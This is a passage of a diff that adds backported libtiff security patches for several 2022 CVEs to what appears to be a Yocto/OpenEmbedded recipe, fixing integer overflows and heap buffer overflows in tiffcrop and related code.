+ obuf = _TIFFmalloc(stripsize);
+ if (obuf == NULL)
+ return (0);
+ _TIFFmemset(obuf, 0, stripsize);
+ (void) TIFFGetFieldDefaulted(out, TIFFTAG_ROWSPERSTRIP, &rowsperstrip);
++ (void) TIFFGetField(out, TIFFTAG_BITSPERSAMPLE, &bps);
++ if( bps == 0 )
++ {
++ TIFFError(TIFFFileName(out), "Error, cannot read BitsPerSample");
++ _TIFFfree(obuf);
++ return 0;
++ }
++ if( (bps % 8) != 0 )
++ {
++ TIFFError(TIFFFileName(out), "Error, cannot handle BitsPerSample that is not a multiple of 8");
++ _TIFFfree(obuf);
++ return 0;
++ }
++ bytes_per_sample = bps/8;
+ for (s = 0; s < spp; s++) {
+ uint32 row;
+ for (row = 0; row < imagelength; row += rowsperstrip) {
+@@ -1539,7 +1539,7 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+
+ cpContigBufToSeparateBuf(
+ obuf, (uint8*) buf + row*rowsize + s,
+- nrows, imagewidth, 0, 0, spp, 1);
++ nrows, imagewidth, 0, 0, spp, bytes_per_sample);
+ if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0) {
+ TIFFError(TIFFFileName(out),
+ "Error, can't write strip %u",
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
new file mode 100644
index 0000000000..01e81349a2
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
@@ -0,0 +1,183 @@
+From 8261237113a53cd21029c4a8cbb62c47b4c19523 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 11:30:18 +0530
+Subject: [PATCH] CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/dd1bcc7abb26094e93636e85520f0d8f81ab0fab]
+CVE: CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_aux.c | 9 +++++++
+ libtiff/tiffiop.h | 1 +
+ tools/tiffcrop.c | 62 ++++++++++++++++++++++++++---------------------
+ 3 files changed, 44 insertions(+), 28 deletions(-)
+
+diff --git a/libtiff/tif_aux.c b/libtiff/tif_aux.c
+index 8188db5..3dac542 100644
+--- a/libtiff/tif_aux.c
++++ b/libtiff/tif_aux.c
+@@ -402,6 +402,15 @@ float _TIFFClampDoubleToFloat( double val )
+ return (float)val;
+ }
+
++uint32 _TIFFClampDoubleToUInt32(double val)
++{
++ if( val < 0 )
++ return 0;
++ if( val > 0xFFFFFFFFU || val != val )
++ return 0xFFFFFFFFU;
++ return (uint32)val;
++}
++
+ int _TIFFSeekOK(TIFF* tif, toff_t off)
+ {
+ /* Huge offsets, especially -1 / UINT64_MAX, can cause issues */
+diff --git a/libtiff/tiffiop.h b/libtiff/tiffiop.h
+index 45a7932..c6f6f93 100644
+--- a/libtiff/tiffiop.h
++++ b/libtiff/tiffiop.h
+@@ -393,6 +393,7 @@ extern double _TIFFUInt64ToDouble(uint64);
+ extern float _TIFFUInt64ToFloat(uint64);
+
+ extern float _TIFFClampDoubleToFloat(double);
++extern uint32 _TIFFClampDoubleToUInt32(double);
+
+ extern tmsize_t
+ _TIFFReadEncodedStripAndAllocBuffer(TIFF* tif, uint32 strip,
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c2c2052..79dd0a0 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5141,17 +5141,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ {
+ if ((crop->res_unit == RESUNIT_INCH) || (crop->res_unit == RESUNIT_CENTIMETER))
+ {
+- x1 = (uint32) (crop->corners[i].X1 * scale * xres);
+- x2 = (uint32) (crop->corners[i].X2 * scale * xres);
+- y1 = (uint32) (crop->corners[i].Y1 * scale * yres);
+- y2 = (uint32) (crop->corners[i].Y2 * scale * yres);
++ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1 * scale * xres);
++ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2 * scale * xres);
++ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1 * scale * yres);
++ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2 * scale * yres);
+ }
+ else
+ {
+- x1 = (uint32) (crop->corners[i].X1);
+- x2 = (uint32) (crop->corners[i].X2);
+- y1 = (uint32) (crop->corners[i].Y1);
+- y2 = (uint32) (crop->corners[i].Y2);
++ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1);
++ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2);
++ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
++ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ }
+ if (x1 < 1)
+ crop->regionlist[i].x1 = 0;
+@@ -5214,17 +5214,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ {
+ if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+ { /* User has specified pixels as reference unit */
+- tmargin = (uint32)(crop->margins[0]);
+- lmargin = (uint32)(crop->margins[1]);
+- bmargin = (uint32)(crop->margins[2]);
+- rmargin = (uint32)(crop->margins[3]);
++ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0]);
++ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1]);
++ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2]);
++ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3]);
+ }
+ else
+ { /* inches or centimeters specified */
+- tmargin = (uint32)(crop->margins[0] * scale * yres);
+- lmargin = (uint32)(crop->margins[1] * scale * xres);
+- bmargin = (uint32)(crop->margins[2] * scale * yres);
+- rmargin = (uint32)(crop->margins[3] * scale * xres);
++ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0] * scale * yres);
++ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1] * scale * xres);
++ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2] * scale * yres);
++ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3] * scale * xres);
+ }
+
+ if ((lmargin + rmargin) > image->width)
+@@ -5254,24 +5254,24 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+ {
+ if (crop->crop_mode & CROP_WIDTH)
+- width = (uint32)crop->width;
++ width = _TIFFClampDoubleToUInt32(crop->width);
+ else
+ width = image->width - lmargin - rmargin;
+
+ if (crop->crop_mode & CROP_LENGTH)
+- length = (uint32)crop->length;
++ length = _TIFFClampDoubleToUInt32(crop->length);
+ else
+ length = image->length - tmargin - bmargin;
+ }
+ else
+ {
+ if (crop->crop_mode & CROP_WIDTH)
+- width = (uint32)(crop->width * scale * image->xres);
++ width = _TIFFClampDoubleToUInt32(crop->width * scale * image->xres);
+ else
+ width = image->width - lmargin - rmargin;
+
+ if (crop->crop_mode & CROP_LENGTH)
+- length = (uint32)(crop->length * scale * image->yres);
++ length = _TIFFClampDoubleToUInt32(crop->length * scale * image->yres);
+ else
+ length = image->length - tmargin - bmargin;
+ }
+@@ -5670,13 +5670,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ {
+ if (page->res_unit == RESUNIT_INCH || page->res_unit == RESUNIT_CENTIMETER)
+ { /* inches or centimeters specified */
+- hmargin = (uint32)(page->hmargin * scale * page->hres * ((image->bps + 7)/ 8));
+- vmargin = (uint32)(page->vmargin * scale * page->vres * ((image->bps + 7)/ 8));
++ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * page->hres * ((image->bps + 7) / 8));
++ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * page->vres * ((image->bps + 7) / 8));
+ }
+ else
+ { /* Otherwise user has specified pixels as reference unit */
+- hmargin = (uint32)(page->hmargin * scale * ((image->bps + 7)/ 8));
+- vmargin = (uint32)(page->vmargin * scale * ((image->bps + 7)/ 8));
++ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * ((image->bps + 7) / 8));
++ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * ((image->bps + 7) / 8));
+ }
+
+ if ((hmargin * 2.0) > (pwidth * page->hres))
+@@ -5714,13 +5714,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ {
+ if (page->mode & PAGE_MODE_PAPERSIZE )
+ {
+- owidth = (uint32)((pwidth * page->hres) - (hmargin * 2));
+- olength = (uint32)((plength * page->vres) - (vmargin * 2));
++ owidth = _TIFFClampDoubleToUInt32((pwidth * page->hres) - (hmargin * 2));
++ olength = _TIFFClampDoubleToUInt32((plength * page->vres) - (vmargin * 2));
+ }
+ else
+ {
+- owidth = (uint32)(iwidth - (hmargin * 2 * page->hres));
+- olength = (uint32)(ilength - (vmargin * 2 * page->vres));
++ owidth = _TIFFClampDoubleToUInt32(iwidth - (hmargin * 2 * page->hres));
++ olength = _TIFFClampDoubleToUInt32(ilength - (vmargin * 2 * page->vres));
+ }
+ }
+
+@@ -5729,6 +5729,12 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ if (olength > ilength)
+ olength = ilength;
+
++ if (owidth == 0 || olength == 0)
++ {
++ TIFFError("computeOutputPixelOffsets", "Integer overflow when calculating the number of pages");
++ exit(EXIT_FAILURE);
++ }
++
+ /* Compute the number of pages required for Portrait or Landscape */
+ switch (page->orient)
+ {
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
new file mode 100644
index 0000000000..131ff94119
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
@@ -0,0 +1,159 @@
+From 07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Wed, 9 Feb 2022 21:31:29 +0000
+Subject: [PATCH] tiffcrop.c: Fix issue #352 heap-buffer-overflow by correcting
+ uint32_t underflow.
+
+CVE: CVE-2022-2867 CVE-2022-2868 CVE-2022-2869
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: tiff-4.1.0/tools/tiffcrop.c
+===================================================================
+--- tiff-4.1.0.orig/tools/tiffcrop.c
++++ tiff-4.1.0/tools/tiffcrop.c
+@@ -5153,29 +5153,45 @@ computeInputPixelOffsets(struct crop_mas
+ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
+ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ }
+- if (x1 < 1)
+- crop->regionlist[i].x1 = 0;
+- else
+- crop->regionlist[i].x1 = (uint32) (x1 - 1);
++ /* a) Region needs to be within image sizes 0.. width-1; 0..length-1
++ * b) Corners are expected to be submitted as top-left to bottom-right.
++ * Therefore, check that and reorder input.
++ * (be aware x,y are already casted to (uint32_t) and avoid (0 - 1) )
++ */
++ uint32_t aux;
++ if (x1 > x2) {
++ aux = x1;
++ x1 = x2;
++ x2 = aux;
++ }
++ if (y1 > y2) {
++ aux = y1;
++ y1 = y2;
++ y2 = aux;
++ }
++ if (x1 > image->width - 1)
++ crop->regionlist[i].x1 = image->width - 1;
++ else if (x1 > 0)
++ crop->regionlist[i].x1 = (uint32_t)(x1 - 1);
+
+ if (x2 > image->width - 1)
+ crop->regionlist[i].x2 = image->width - 1;
+- else
+- crop->regionlist[i].x2 = (uint32) (x2 - 1);
+- zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
+-
+- if (y1 < 1)
+- crop->regionlist[i].y1 = 0;
+- else
+- crop->regionlist[i].y1 = (uint32) (y1 - 1);
++ else if (x2 > 0)
++ crop->regionlist[i].x2 = (uint32_t)(x2 - 1);
++
++ zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++
++ if (y1 > image->length - 1)
++ crop->regionlist[i].y1 = image->length - 1;
++ else if (y1 > 0)
++ crop->regionlist[i].y1 = (uint32_t)(y1 - 1);
+
+ if (y2 > image->length - 1)
+ crop->regionlist[i].y2 = image->length - 1;
+- else
+- crop->regionlist[i].y2 = (uint32) (y2 - 1);
+-
+- zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
++ else if (y2 > 0)
++ crop->regionlist[i].y2 = (uint32_t)(y2 - 1);
+
++ zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
+ if (zwidth > max_width)
+ max_width = zwidth;
+ if (zlength > max_length)
+@@ -5205,7 +5221,7 @@ computeInputPixelOffsets(struct crop_mas
+ }
+ }
+ return (0);
+- }
++ } /* crop_mode == CROP_REGIONS */
+
+ /* Convert crop margins into offsets into image
+ * Margins are expressed as pixel rows and columns, not bytes
+@@ -5241,7 +5257,7 @@ computeInputPixelOffsets(struct crop_mas
+ bmargin = (uint32) 0;
+ return (-1);
+ }
+- }
++ } /* crop_mode == CROP_MARGINS */
+ else
+ { /* no margins requested */
+ tmargin = (uint32) 0;
+@@ -5332,24 +5348,23 @@ computeInputPixelOffsets(struct crop_mas
+ off->endx = endx;
+ off->endy = endy;
+
+- crop_width = endx - startx + 1;
+- crop_length = endy - starty + 1;
+-
+- if (crop_width <= 0)
++ if (endx + 1 <= startx)
+ {
+ TIFFError("computeInputPixelOffsets",
+ "Invalid left/right margins and /or image crop width requested");
+ return (-1);
+ }
++ crop_width = endx - startx + 1;
+ if (crop_width > image->width)
+ crop_width = image->width;
+
+- if (crop_length <= 0)
++ if (endy + 1 <= starty)
+ {
+ TIFFError("computeInputPixelOffsets",
+ "Invalid top/bottom margins and /or image crop length requested");
+ return (-1);
+ }
++ crop_length = endy - starty + 1;
+ if (crop_length > image->length)
+ crop_length = image->length;
+
+@@ -5449,10 +5464,17 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->selections = crop->zones;
+
+- for (i = 0; i < crop->zones; i++)
++ /* Initialize regions iterator i */
++ i = 0;
++ for (int j = 0; j < crop->zones; j++)
+ {
+- seg = crop->zonelist[i].position;
+- total = crop->zonelist[i].total;
++ seg = crop->zonelist[j].position;
++ total = crop->zonelist[j].total;
++
++ /* check for not allowed zone cases like 0:0; 4:3; etc. and skip that input */
++ if (seg == 0 || total == 0 || seg > total) {
++ continue;
++ }
+
+ switch (crop->edge_ref)
+ {
+@@ -5581,8 +5603,11 @@ getCropOffsets(struct image_data *image,
+ i + 1, (uint32)zwidth, (uint32)zlength,
+ crop->regionlist[i].x1, crop->regionlist[i].x2,
+ crop->regionlist[i].y1, crop->regionlist[i].y2);
++ /* increment regions iterator */
++ i++;
+ }
+-
++ /* set number of generated regions out of given zones */
++ crop->selections = i;
+ return (0);
+ } /* end getCropOffsets */
+
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
new file mode 100644
index 0000000000..cf440ce55f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
@@ -0,0 +1,29 @@
+From 06386cc9dff5dc162006abe11fd4d1a6fad616cc Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 18 Aug 2022 09:40:50 +0530
+Subject: [PATCH] CVE-2022-34526
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/275735d0354e39c0ac1dc3c0db2120d6f31d1990]
+CVE: CVE-2022-34526
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dirinfo.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index 52d53d4..4a1ca00 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -983,6 +983,9 @@ _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag)
+ default:
+ return 1;
+ }
++ if( !TIFFIsCODECConfigured(tif->tif_dir.td_compression) ) {
++ return 0;
++ }
+ /* Check if codec specific tags are allowed for the current
+ * compression scheme (codec) */
+ switch (tif->tif_dir.td_compression) {
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
new file mode 100644
index 0000000000..760e20dd2b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
@@ -0,0 +1,659 @@
+From 226e336cdceec933da2e9f72b6578c7a1bea450b Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Thu, 13 Oct 2022 14:33:27 +0000
+Subject: [PATCH] tiffcrop subroutines require a larger buffer (fixes #271,
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3570 CVE-2022-3598
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/cfbb883bf6ea7bedcb04177cc4e52d304522fdff
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/24d3b2425af24432e0e4e2fd58b33f3b04c4bfa4
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ #381, #386, #388, #389, #435)
+
+---
+ tools/tiffcrop.c | 209 ++++++++++++++++++++++++++---------------------
+ 1 file changed, 117 insertions(+), 92 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c7877aa..c923920 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -126,6 +126,7 @@ static char tiffcrop_rev_date[] = "03-03-2010";
+
+ #ifdef HAVE_STDINT_H
+ # include <stdint.h>
++# include <inttypes.h>
+ #endif
+
+ #ifndef HAVE_GETOPT
+@@ -212,6 +213,10 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+
+ #define TIFF_DIR_MAX 65534
+
++/* Some conversion subroutines require image buffers, which are at least 3 bytes
++ * larger than the necessary size for the image itself. */
++#define NUM_BUFF_OVERSIZE_BYTES 3
++
+ /* Offsets into buffer for margins and fixed width and length segments */
+ struct offset {
+ uint32 tmargin;
+@@ -233,7 +238,7 @@ struct offset {
+ */
+
+ struct buffinfo {
+- uint32 size; /* size of this buffer */
++ size_t size; /* size of this buffer */
+ unsigned char *buffer; /* address of the allocated buffer */
+ };
+
+@@ -771,8 +776,8 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
+ uint32 dst_rowsize, shift_width;
+ uint32 bytes_per_sample, bytes_per_pixel;
+ uint32 trailing_bits, prev_trailing_bits;
+- uint32 tile_rowsize = TIFFTileRowSize(in);
+- uint32 src_offset, dst_offset;
++ tmsize_t tile_rowsize = TIFFTileRowSize(in);
++ tmsize_t src_offset, dst_offset;
+ uint32 row_offset, col_offset;
+ uint8 *bufp = (uint8*) buf;
+ unsigned char *src = NULL;
+@@ -822,7 +827,7 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
+ TIFFError("readContigTilesIntoBuffer", "Integer overflow when calculating buffer size.");
+ exit(-1);
+ }
+- tilebuf = _TIFFmalloc(tile_buffsize + 3);
++ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (tilebuf == 0)
+ return 0;
+ tilebuf[tile_buffsize] = 0;
+@@ -986,7 +991,7 @@ static int readSeparateTilesIntoBuffer (TIFF* in, uint8 *obuf,
+ for (sample = 0; (sample < spp) && (sample < MAX_SAMPLES); sample++)
+ {
+ srcbuffs[sample] = NULL;
+- tbuff = (unsigned char *)_TIFFmalloc(tilesize + 8);
++ tbuff = (unsigned char *)_TIFFmalloc(tilesize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!tbuff)
+ {
+ TIFFError ("readSeparateTilesIntoBuffer",
+@@ -1181,7 +1186,8 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ }
+ rowstripsize = rowsperstrip * bytes_per_sample * (width + 1);
+
+- obuf = _TIFFmalloc (rowstripsize);
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ obuf = _TIFFmalloc (rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (obuf == NULL)
+ return 1;
+
+@@ -1194,7 +1200,7 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ stripsize = TIFFVStripSize(out, nrows);
+ src = buf + (row * rowsize);
+ total_bytes += stripsize;
+- memset (obuf, '\0', rowstripsize);
++ memset (obuf, '\0',rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (extractContigSamplesToBuffer(obuf, src, nrows, width, s, spp, bps, dump))
+ {
+ _TIFFfree(obuf);
+@@ -1202,10 +1208,15 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ }
+ if ((dump->outfile != NULL) && (dump->level == 1))
+ {
+- dump_info(dump->outfile, dump->format,"",
++ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
++ dump_info(dump->infile, dump->format, "loadImage",
++ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
++ (uint64_t)scanlinesize);
++ }
++ dump_info(dump->outfile, dump->format,"",
+ "Sample %2d, Strip: %2d, bytes: %4d, Row %4d, bytes: %4d, Input offset: %6d",
+- s + 1, strip + 1, stripsize, row + 1, scanlinesize, src - buf);
+- dump_buffer(dump->outfile, dump->format, nrows, scanlinesize, row, obuf);
++ s + 1, strip + 1, stripsize, row + 1, (uint32)scanlinesize, src - buf);
++ dump_buffer(dump->outfile, dump->format, nrows, (uint32)scanlinesize, row, obuf);
+ }
+
+ if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0)
+@@ -1232,7 +1243,7 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
+ uint32 tl, tw;
+ uint32 row, col, nrow, ncol;
+ uint32 src_rowsize, col_offset;
+- uint32 tile_rowsize = TIFFTileRowSize(out);
++ tmsize_t tile_rowsize = TIFFTileRowSize(out);
+ uint8* bufp = (uint8*) buf;
+ tsize_t tile_buffsize = 0;
+ tsize_t tilesize = TIFFTileSize(out);
+@@ -1275,9 +1286,11 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
+ }
+ src_rowsize = ((imagewidth * spp * bps) + 7U) / 8;
+
+- tilebuf = _TIFFmalloc(tile_buffsize);
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (tilebuf == 0)
+ return 1;
++ memset(tilebuf, 0, tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ for (row = 0; row < imagelength; row += tl)
+ {
+ nrow = (row + tl > imagelength) ? imagelength - row : tl;
+@@ -1323,7 +1336,8 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
+ uint32 imagewidth, tsample_t spp,
+ struct dump_opts * dump)
+ {
+- tdata_t obuf = _TIFFmalloc(TIFFTileSize(out));
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ tdata_t obuf = _TIFFmalloc(TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
+ uint32 tl, tw;
+ uint32 row, col, nrow, ncol;
+ uint32 src_rowsize, col_offset;
+@@ -1333,6 +1347,7 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
+
+ if (obuf == NULL)
+ return 1;
++ memset(obuf, 0, TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
+
+ TIFFGetField(out, TIFFTAG_TILELENGTH, &tl);
+ TIFFGetField(out, TIFFTAG_TILEWIDTH, &tw);
+@@ -1754,14 +1769,14 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+
+ *opt_offset = '\0';
+ /* convert option to lowercase */
+- end = strlen (opt_ptr);
++ end = (unsigned int)strlen (opt_ptr);
+ for (i = 0; i < end; i++)
+ *(opt_ptr + i) = tolower((int) *(opt_ptr + i));
+ /* Look for dump format specification */
+ if (strncmp(opt_ptr, "for", 3) == 0)
+ {
+ /* convert value to lowercase */
+- end = strlen (opt_offset + 1);
++ end = (unsigned int)strlen (opt_offset + 1);
+ for (i = 1; i <= end; i++)
+ *(opt_offset + i) = tolower((int) *(opt_offset + i));
+ /* check dump format value */
+@@ -2213,6 +2228,8 @@ main(int argc, char* argv[])
+ size_t length;
+ char temp_filename[PATH_MAX + 16]; /* Extra space keeps the compiler from complaining */
+
++ assert(NUM_BUFF_OVERSIZE_BYTES >= 3);
++
+ little_endian = *((unsigned char *)&little_endian) & '1';
+
+ initImageData(&image);
+@@ -3114,13 +3131,13 @@ extractContigSamples32bits (uint8 *in, uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -3495,13 +3512,13 @@ extractContigSamplesShifted32bits (uint8 *in, uint8 *out, uint32 cols,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -3678,10 +3695,10 @@ extractContigSamplesToTileBuffer(uint8 *out, uint8 *in, uint32 rows, uint32 cols
+ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
+ {
+ uint8* bufp = buf;
+- int32 bytes_read = 0;
++ tmsize_t bytes_read = 0;
+ uint32 strip, nstrips = TIFFNumberOfStrips(in);
+- uint32 stripsize = TIFFStripSize(in);
+- uint32 rows = 0;
++ tmsize_t stripsize = TIFFStripSize(in);
++ tmsize_t rows = 0;
+ uint32 rps = TIFFGetFieldDefaulted(in, TIFFTAG_ROWSPERSTRIP, &rps);
+ tsize_t scanline_size = TIFFScanlineSize(in);
+
+@@ -3694,13 +3711,12 @@ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
+ bytes_read = TIFFReadEncodedStrip (in, strip, bufp, -1);
+ rows = bytes_read / scanline_size;
+ if ((strip < (nstrips - 1)) && (bytes_read != (int32)stripsize))
+- TIFFError("", "Strip %d: read %lu bytes, strip size %lu",
+- (int)strip + 1, (unsigned long) bytes_read,
+- (unsigned long)stripsize);
++ TIFFError("", "Strip %"PRIu32": read %"PRId64" bytes, strip size %"PRIu64,
++ strip + 1, bytes_read, stripsize);
+
+ if (bytes_read < 0 && !ignore) {
+- TIFFError("", "Error reading strip %lu after %lu rows",
+- (unsigned long) strip, (unsigned long)rows);
++ TIFFError("", "Error reading strip %"PRIu32" after %"PRIu64" rows",
++ strip, rows);
+ return 0;
+ }
+ bufp += stripsize;
+@@ -4164,13 +4180,13 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -4213,10 +4229,10 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
+ row + 1, col + 1, src_byte, src_bit, dst - out);
+
+- dump_long (dumpfile, format, "Match bits ", matchbits);
++ dump_wide (dumpfile, format, "Match bits ", matchbits);
+ dump_data (dumpfile, format, "Src bits ", src, 4);
+- dump_long (dumpfile, format, "Buff1 bits ", buff1);
+- dump_long (dumpfile, format, "Buff2 bits ", buff2);
++ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
++ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
